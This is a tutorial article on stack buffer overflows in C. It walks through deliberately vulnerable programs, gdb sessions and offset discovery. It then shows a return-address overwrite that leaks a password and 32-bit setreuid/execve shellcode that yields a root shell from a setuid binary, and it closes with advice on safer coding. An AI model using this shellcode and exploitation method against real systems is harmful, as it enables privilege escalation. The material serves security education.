The Oldest Trick in the Book

Learn about buffer overflow exploits and how to avoid them.

As the reach and deployment of computer technology expand, the risks and problems associated with pervasive use and the often breakneck speed of innovation and adoption impose more and more frequently. And while numerous security advisories are issued every day, those alerts probably represent only a tiny fraction of the faults that exist and have yet to be discovered — either by the good guys or the bad guys.

One serious problem is vulnerability, where a fault or an oversight in a software application allows unauthorized access to the computer. While some vulnerabilities are “mostly harmless” — for instance, spyware may be unwanted, but is otherwise benign — others vulnerabilities can undermine privacy and even breach security measures. A significant weakness, or exploit, can even permit a malcontent to trick a program into doing something it wasn’t designed to do.

Oddly enough, the most commonly attacked exploit, the buffer overflow, is also the oldest. Around since the infancy of computers in the 1960s, buffer overflow first gained widespread notoriety in 1988, when the first Internet worm, Morris (named after its creator), propagated by exploiting a buffer overflow vulnerability in the fingerd daemon. Some twenty years later, Internet worms like Code Red and Blaster propogated by exploiting buffer overflows, too. Today, a calculator may have more computing power than the Apollo spacecraft, but the more things change, the more they stay the same.

On to the main() Event

Since there’s no explanation better than experience, here’s is a simple body of code that’s vulnerable to a buffer overflow:

$ cat vuln.c
int main(int argc, char *argv[])
{
  char buffer[10];
  strcpy(buffer, argv[1]);
  return 0;
}

The code expects a single command-line argument, which is then copied into the ten-character buffer, buffer. However, because the program doesn’t check the length of the command-line argument before the strcpy(), it can suffer an overflow. Compile and run the program to see what happens:

$ gcc –o vuln vuln.c
$ ./vuln AAAAAAA
$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
$ 

The program crashes with a segmentation fault, which means that something important was overwritten by the unexpected extra data. You can see specifically what happened by looking at the program’s dumped core file using a debugger like gdb.

$ ulimit –c unlimited
$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
$ gdb –q –c core
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info register eip
eip 0x41414141 0x41414141
(gdb) info stack
0x41414141: Cannot access memory at address 0x41414141
(gdb) quit
$

The ulimit command allows core dumps to get as big as needed, so this time, vuln with a large argument produces a core file. gdb reveals that the vuln program crashed because the extended instruction pointer (EIP) was set to 0×41414141. (Why 0×41414141? 0×41 is hexadecimal for the character “A.”) Since this is a memory address that cannot be accessed, the program crashed.

A little background on how a program actually works would probably be helpful here. The EIP is just a 32-bit register that holds the address of the currently executing instruction. All of the programs instructions are stored in a memory segment called the text segment. If the text segment is a book filled with instructions, then the EIP is a finger pointing to words as it reads them.

Easy enough, but oftentimes the program has to jump around in the text segment in a non-linear fashion. When a function is called, for example, the EIP has to jump to a different part of the text segment to execute the function, but afterwards it needs to be able to return to where it was to execute the next instruction. Continuing with the book metaphor, what’s needed here is some sort of bookmark, so the program can set a bookmark, jump to the function, execute it, and then return to the bookmark. This is what another section of memory called the stack is used for.

Additionally, the stack also provides each function with its own context, which allows each function to have its own local variables that only it knows about. So every time a function is called, a stack frame is created which contains the local variables for that function and the return address so the program execution can continue after the function completed. (The stack is also used to pass arguments to functions, which the function treats as local variables, too.)

Each stack frame is stored on the stack, which is a” First In, Last Out” (FILO) structure. (Imagine putting beads on a string with a knot on the end. The first bead you put on is be the last one to come off.) When a stack frame is put on the stack it is pushed on the stack; when a stack frame is removed from the stack it is popped from the stack. This structure proves to be useful when multiple functions are called within each other.

For example, consider functions.c, shown in Listing One.

LISTING ONE: functions.c, a C program with nested function calls

$ cat functions.c
int j = 11;
int func2()
{
int i = 7;
printf("\t\tIn function #2\n");
printf("\t\ti = %d, j = %d\n", i, j);
printf("\t\tExiting function #2\n");
return 0;
}
int func1()
{
int i = 5;
printf("\tIn function #1\n");
printf("\ti = %d, j = %d\n", i, j);
func2();
printf("\tExiting function #1\n");
return 0;
}
int main()
{
int i = 3;
printf("In main\n");
printf("i = %d, j = %d\n", i, j);
func1();
printf("Exiting main\n");
return 0;
}

If you build the code with gcc –g –o functions functions.c and run it with ./functions, you should see this:

In main
i = 3, j = 11
In function #1
i = 5, j = 11
In function #2
i = 7, j = 11
Exiting function #2
Exiting function #1
Exiting main

j is a global variable, so it's available in every function context and is stored in a completely different segment of memory. When main() is executed, a stack frame is created and pushed to the stack containing it's local variables, where i is 3. When func1() is called within main(), another stack frame is created with both the return address to get back to the next instruction in main() and func1()' s local variables. Within func1(), i is 5. Next func2() is called from func1(), which creates yet another stack frame with the return address for the next instruction in func1() and func2()' s local variables, where i is 7. After each function completes, its stack frames is popped off and the EIP is restored to continue execution where the calling function left off.

These different stack frames can be examined with gdb. Run gdb –q functions and then set breakpoints before and after each function is called to pause the program's execution and give you a chance to look at the stack frames. This is shown in Figure One.

FIGURE ONE: Examining the stack of Listing One in gdb

$ gdb –q functions
(gdb) list 1
1       int j = 11;
2
3       int func2()
4       {
5               int i = 7;
6               printf("\t\tIn function #2\n");
7               printf("\t\ti = %d, j = %d\n", i, j);
...
29              return 0;
30      }
(gdb) break 7
Breakpoint 1 at 0x8048351: file functions.c, line 7.
(gdb) break 16
Breakpoint 2 at 0x8048399: file functions.c, line 16.
(gdb) break 18
Breakpoint 3 at 0x80483ba: file functions.c, line 18.
(gdb) break 26
Breakpoint 4 at 0x80483f0: file functions.c, line 26.
(gdb) break 28
Breakpoint 5 at 0x8048411: file functions.c, line 28.
 (gdb) run
Starting program: /home/matrix/research/article/functions
In main
 Breakpoint 4, main () at functions.c:26
26              printf("i = %d, j = %d\n", i, j);
(gdb) info stack
#0  main () at functions.c:26
#1  0x4003890b in __libc_start_main () from /lib/libc.so.6
(gdb) continue
Continuing.
i = 3, j = 11
		In function #1
 Breakpoint 2, func1 () at functions.c:16
16              printf("\ti = %d, j = %d\n", i, j);
(gdb) info stack
#0  func1 () at functions.c:16
#1  0x08048411 in main () at functions.c:27
#2  0x4003890b in __libc_start_main () from /lib/libc.so.6
(gdb) continue
Continuing.
		i = 5, j = 11
				In function #2
 Breakpoint 1, func2 () at functions.c:7
7               printf("\t\ti = %d, j = %d\n", i, j);
(gdb) info stack
#0  func2 () at functions.c:7
#1  0x080483ba in func1 () at functions.c:17
#2  0x08048411 in main () at functions.c:27
#3  0x4003890b in __libc_start_main () from /lib/libc.so.6
(gdb) continue
Continuing.
				i = 7, j = 11
				Exiting function #2
 Breakpoint 3, func1 () at functions.c:18
18              printf("\tExiting function #1\n");
(gdb) info stack
#0  func1 () at functions.c:18
#1  0x08048411 in main () at functions.c:27
#2  0x4003890b in __libc_start_main () from /lib/libc.so.6
(gdb) continue
Continuing.
		Exiting function #1
 Breakpoint 5, main () at functions.c:28
28              printf("Exiting main\n");
(gdb) info stack
#0  main () at functions.c:28
#1  0x4003890b in __libc_start_main () from /lib/libc.so.6
(gdb) continue
Continuing.
Exiting main
 Program exited normally.
(gdb) quit

At breakpoint 4, the program is still in the main() function, so main() is the only stack frame (besides the libc start frame). The execution continues to breakpoint 2 in func1() just before func2() is called. Here another stack frame can be seen on the stack for func1(). As execution continues to breakpoint 1 found within func2(), another stack frame is pushed to the stack for func2().

Then execution continues through to breakpoint 3 which is found back in func1() after the func2() call. Here, func2() ’s stack frame has been popped off the stack and the return address is used to return EIP into func1(). Finally, breakpoint 5 is reached near the end of main(), and func1() ’s stack frame has similarly been popped off the stack to return execution to main().

Given how the stack frame works, with the return address located near the end of the stack frame and local variables found at the beginning, if a local variable overflows, it can overwrite the return address.

Returning to the vuln program, its EIP was set to 0x41414141 because the local variable buffer overflowed and overwrote the return address in the stack frame. Then when the program popped that frame off and tried to return to where its metaphorical bookmark was, it crashed. Since the buffer is supplied by user input and the buffer can overflow into the return address, the EIP and the execution of the program can be controlled by the user.

Your First Exploit

Let’s try to control the EIP of the vuln program and set it to 0x12345678. First, you need to identify exactly where the return address is in relation to buffer. (This is usually farther out than one would expect since the compiler pads a bit.) Since the x86 is a 32-bit architecture, everything on the stack is in 32-bit words (four 8-bit bytes), so the search can be done using blocks of 4 characters. Run vuln with an argument composed of 24 “A”s, then 4 “B”s, 4 “C”s, and 4 “D”s.

$ ./vuln `perl –e 'print "AAAA"x6 . "BBBB" . "CCCC" . "DDDD";'`
Segmentation fault (core dumped)
$ gdb –q –c core
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDD'.
Program terminated with signal 11, Segmentation fault.
#0  0x43434343 in ?? ()
(gdb) info register eip
eip            0x43434343       0x43434343
(gdb) quit

If you examine core, EIP is set to 0x43434343, corresponding to" C". This means that the return address is located 28 bytes from the beginning of the buffer. This information can be used to overwrite the return address.

$ ./vuln `perl –e 'print "A"x28 . "\x12\x34\x56\x78";'`
Segmentation fault (core dumped)
$ gdb –q –c core
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA4Vx'.
Program terminated with signal 11, Segmentation fault.
#0 0x78563412 in ?? ()
(gdb) info register eip
eip 0x78563412 0x78563412
(gdb) quit

That almost worked, however the bytes are reversed. This is because Intel uses little endian architecture, where the least significant byte is stored first. This means if you want to overwrite an address, you need to reverse the bytes.

$ ./vuln `perl –e 'print "A"x28 . "\x78\x56\x34\x12";'`
Segmentation fault (core dumped)
$ gdb –q –c core
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAxV4'.
Program terminated with signal 11, Segmentation fault.
#0 0x12345678 in ?? ()
(gdb) info register eip
eip 0x12345678 0x12345678
(gdb) quit

EIP has been set to 0x12345678 thanks to the buffer overflow.

Onwards and Downwards

Let's take a look at slightly bigger and more intriguing program, shown in Listing Two.

LISTING TWO: admin.c, a program vulnerable to a buffer overflow

// global variable
char password[9];
// function
void view_password()
{
printf("The admin password is currently \'%s\'\n", password);
}
// main program
int main(int argc, char *argv[])
{
int c;
char buffer[10];
// Obfuscation of the password (so it can't be retrieved w/ strings)
password[0] = 83; password[1] = 67; password[2] = password[6] = 79;
password[3] = 82; password[4] = 80; password[5] = 73;
password[6] = 79; password[7] = 78; /* password is SCORPION */
if(argc < 2) // If no argument is supplied,
{ // display a usage message and quit
printf("Usage: %s \n", argv[0]);
exit(0);
}
strcpy(buffer, argv[1]);
if(strcmp(buffer, password) == 0) // if password is correct
{ // display the admin menu
printf("Access Granted\nWelcome to the admin menu..\n");
while(c != 2)
{
printf("-= Admin Menu =-\n\n1 - View Password\n2 - Exit\n-> ");
scanf("%d", &c);
if(c == 1) view_password();
}
}
else // otherwise display denial message
{
printf("Incorrect Password\nAccess Denied.\n");
}
return 0;
}

Listing Two checks for a command-line password to allow access to a fairly useless administration menu. (Just pretend the admin menu has a plethora of other options, since its robustness isn’t the point of this program.) Let’s compile it and play around with it a little bit.

$ gcc –o admin admin.c
$ ./admin
Usage: ./admin
$ ./admin test
Incorrect Password
Access Denied.
$ ./admin god
Incorrect Password
Access Denied.

As you can see, the program works as expected and the password isn’t test or god. Now let’s see what happens if we overflow the expected password argument.

$ ./admin AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Incorrect Password
Access Denied.
Segmentation fault (core dumped)
$ gdb –q –c core
Core was generated by `./admin AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info register eip
eip 0x41414141 0x41414141
(gdb) info stack
#0 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) quit

The program crashes just as vuln did, and with a little experimation, you can set the EIP as before. But what would be useful would be to get the password. The function view_password() emits the password, if you just call it. Since we can now control the EIP, we can bypass all of the program’s logic and go directly to this function if we know its address in the text segment. Fortunately (or perhaps unfortunately), this can be found using gdb.

$ gdb –q admin
(gdb) break main
Breakpoint 1 at 0x804842a
(gdb) run
Starting program: /home/matrix/research/article/admin
Breakpoint 1, 0x0804842a in main ()
(gdb) print view_password
$1 = {} 0x8048408

Now we know that view_password() is found at 0x08048408 in the text segment. You can use this information to get that password.

$ ./admin `perl –e 'print "A"x44 . "\x08\x84\x04\x08";'`
Incorrect Password
Access Denied.
The admin password is currently 'SCORPION'
Segmentation fault (core dumped)
$

It Gets Worse

A buffer overflow exploit is especially serious on multi-user systems like Linux, where permissions determine what files can be read, written to, and executed. In addition, some programs may only be executed by the superuser, root. These programs are called setuid root programs since they are owned by root and have what’s known as a set user ID (suid) permission turned on. One example is the /usr/bin/passwd program:

$ ls –l /usr/bin/passwd
-rwsr-xr-x 1 root root 27500 Jan 5 03:13 /usr/bin/passwd

The suid bit is shown in bold)

Since /usr/bin/passwd allows users to change their passwords, the program needs to be able to write to the password file (typically, /etc/passwd). Obviously, the system cannot be set up so just anyone can write to the password file; instead, /usr/bin/passwd runs as if it’s the root user and makes the changes.

But as we saw earlier, if a buffer overflow exists, the program logic can be totally bypassed. Let's assume that the admin program shown in Listing Two has to modify some root- owned files, so admin needs to be suid root. The commands to make admin setuid root are chown and chmod:

$ sudo chown root.root ./admin
$ sudo chmod u+s ./admin
$ ls –l ./admin
-rwsr-xr-x 1 root root 7589 Mar 13 22:18 ./admin

If the admin program actually did modify some root owned files, you could set EIP to various functions found in the text segment like before, allowing you to bypass the program logic. However, you are still limited to the instructions found in the text segment. Returning to the book metaphor, you can trick the program into reading instructions it wouldn't have usually read, but are still limited by the instructions printed in the book.

But what if you could staple your own handwritten instructions to the back of the book and then move the bookmark there? These instructions could be crafted to say something to the effect of “Accept commands from the user and do whatever you’re told to do.” Something like that would be devastating if that program was set suid root, since the program would act as a proxy, effectively giving the user full root access to the system.

And indeed you can staple your own pages using specially crafted instructions called shellcode. Shellcode can be inserted into a different memory segment, such as the stack, and execution can be moved out of the text segment into the shellcode.

For example, the shellcode shown in Listing Three restores root user permissions and then executes an interactive shell.

LISTING THREE: shellcode.asm, an example of shellcode

BITS 32
; setreuid(uid_t ruid, uid_t euid)
xor eax, eax ; first eax must be 0 for the next instruction
mov al, 70 ; put 70 into eax, since setreuid is syscall #70
xor ebx, ebx ; put 0 into ebx, to set real uid to root
xor ecx, ecx ; put 0 into ecx, to set effective uid to root
int 0x80 ; Call the kernel to make the system call happen
jmp short two ; Jump down to the bottom for the call trick
one:
pop ebx ; pop the "return address" from the stack
; to put the address of the string into ebx
; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax ; subtract 70 from eax to put 0 into eax
mov [ebx+7], al ; put the 0 from eax where the X is in the string
; ( 7 bytes offset from the beginning)
mov [ebx+8], ebx ; put the address of the string from ebx where the
; AAAA is in the string ( 8 bytes offset)
mov [ebx+12], eax ; put the a NULL address (4 bytes of 0) where the
; BBBB is in the string ( 12 bytes offset)
mov al, 11 ; Now put 11 into eax, since execve is syscall #11
lea ecx, [ebx+8] ; Load the address of where the AAAA was in the string
; into ecx
lea edx, [ebx+12] ; Load the address of where the BBBB was in the string
; into edx
int 0x80 ; Call the kernel to make the system call happen
two:
call one ; Use a call to get back to the top and get the
db '/bin/sh' ; address of this string

So how do you inject the shellcode? One way is via environment variables.

Environment variables are stored in stack memory, so that provides a convenient place to inject the shellcode.

$ nasm shellcode.asm
$ ls –l shellcode
-rw-r--r-- 1 matrix users 46 Mar 13 23:47 shellcode
$ export SHELLCODE=`cat shellcode`
$ echo 'main(){printf("%p\n",getenv("SHELLCODE"));}' envaddr.c>
$ gcc –o eaddr envaddr.c
$ ./eaddr
0xbffff8e8

Above, the shellcode is assembled using nasm and the assembled shellcode is stored in an environment variable aptly named SHELLCODE. Then a simple program is quickly coded and compiled to predict the address of the shellcode when the admin program is executed. This program must have the same number of characters in its name as the target program, since the name of the executing program shifts values on the stack.

Now, if EIP is set to the address (0xbffff8e8), the program's execution flows into the shellcode. Since the program is suid root, the program opens a shell as root, giving you full access to the system.

$ ./admin `perl –e 'print "A"x44 . "\xe8\xf8\xff\xbf";'`
Incorrect Password
Access Denied.
sh-2.05b# whoami
root
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel)
sh-2.05b# exit

Not only does the shellcode bypass the program's logic, it allows the user to make the program do things on his behalf that it wasn't even designed to do. And this type of arbitrary control over a suid root program has a severe impact to the security of the system.

Heads Up!

Buffer overflows have been around for decades and are simply the result of insecure programming practices. There are some methods, like non-executable stacks (see the sidebar), that try to mitigate these types of vulnerabilities, but there really is no substitute for security conscience programming practices.

Using functions like strncpy() and strlcpy() instead of strcpy() copies strings up to a maximum length, giving you more control. There is nothing inherently wrong with using strcpy() in general, but there is if you can't be certain the destination is at least as large as the source. Just try to think about what would happen if someone were to input an extra large piece of data, because if it's a public program, someone out there eventually will.

According to the National Institute of Standards and Technology, in the past 4 years, 871 buffer overflow vulnerabilities were exploited, comprising about 20 percent of all exploits.

The world of computers has developed astronomically since the 1960s, yet buffer overflow vulnerabilities have persisted. It’s 2005 now — perhaps it’s about time for general programming practices to catch up.